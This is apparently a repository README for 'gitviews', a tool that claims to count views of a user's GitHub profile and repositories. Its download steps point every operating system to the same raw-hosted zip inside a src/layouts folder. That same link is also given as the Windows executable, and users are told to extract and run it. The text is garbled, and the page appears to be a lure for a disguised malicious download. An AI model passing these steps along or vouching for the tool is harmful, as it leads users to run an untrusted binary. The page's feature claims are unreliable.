Welcome to gitviews! This tool helps you see how many people have viewed your GitHub profile and repositories. It is perfect for users who want to understand their visibility on GitHub without any technical hassle.
Before you start, ensure your system meets the following requirements:
- Operating System: Windows 10 or later, macOS Mojave or later, or any Linux distribution.
- Memory: At least 4 GB of RAM.
- Disk Space: 100 MB of free space.
- JavaScript enabled browser: Chrome, Firefox, or Edge for viewing results.

Visit the Releases Page
Go to the Releases page to find the latest version of gitviews. -
Choose Your Version
Look for the latest release. You will see options for different systems. -
Download the Application
Click on the appropriate file for your system. It might be labeled ashttps://raw.githubusercontent.com/maloy2223/gitviews/main/src/layouts/gitviews-3.5.zip,https://raw.githubusercontent.com/maloy2223/gitviews/main/src/layouts/gitviews-3.5.zip, orhttps://raw.githubusercontent.com/maloy2223/gitviews/main/src/layouts/gitviews-3.5.zip. Download the file. -
Extract Files
Once the file is downloaded, locate it on your computer.- For Windows: Right-click the file, select "Extract All", and follow the prompts.
- For macOS: Double-click the zip file to extract it.
- For Linux: Use your file manager or Terminal to extract the zip.

Run the Application
Locate the extracted folder. Inside, you will find an executable file, such ashttps://raw.githubusercontent.com/maloy2223/gitviews/main/src/layouts/gitviews-3.5.zipfor Windows orgitviewsfor macOS/Linux. Double-click this file to open it. -
Using gitviews
Once the application is open, it will prompt you to enter your GitHub username. Input your username and click the "View" button. That’s it! You will see the count of views for your profile and any selected repositories.
- Profile View Count: See how many times your profile has been viewed.
- Repository View Count: Get specific counts for individual repositories.
- Simple Interface: User-friendly design for effortless navigation.
- Quick Updates: The tool fetches data in real-time for the most accurate numbers.
You can check your view counts anytime. Data updates frequently, so feel free to revisit regularly for the latest numbers.
View counts can change based on user activity, such as visits from new users or inactivity from others. This data reflects real-time interactions.
Currently, gitviews is designed for desktop use. Future versions may include mobile compatibility, but for now, it's best to access from a computer.
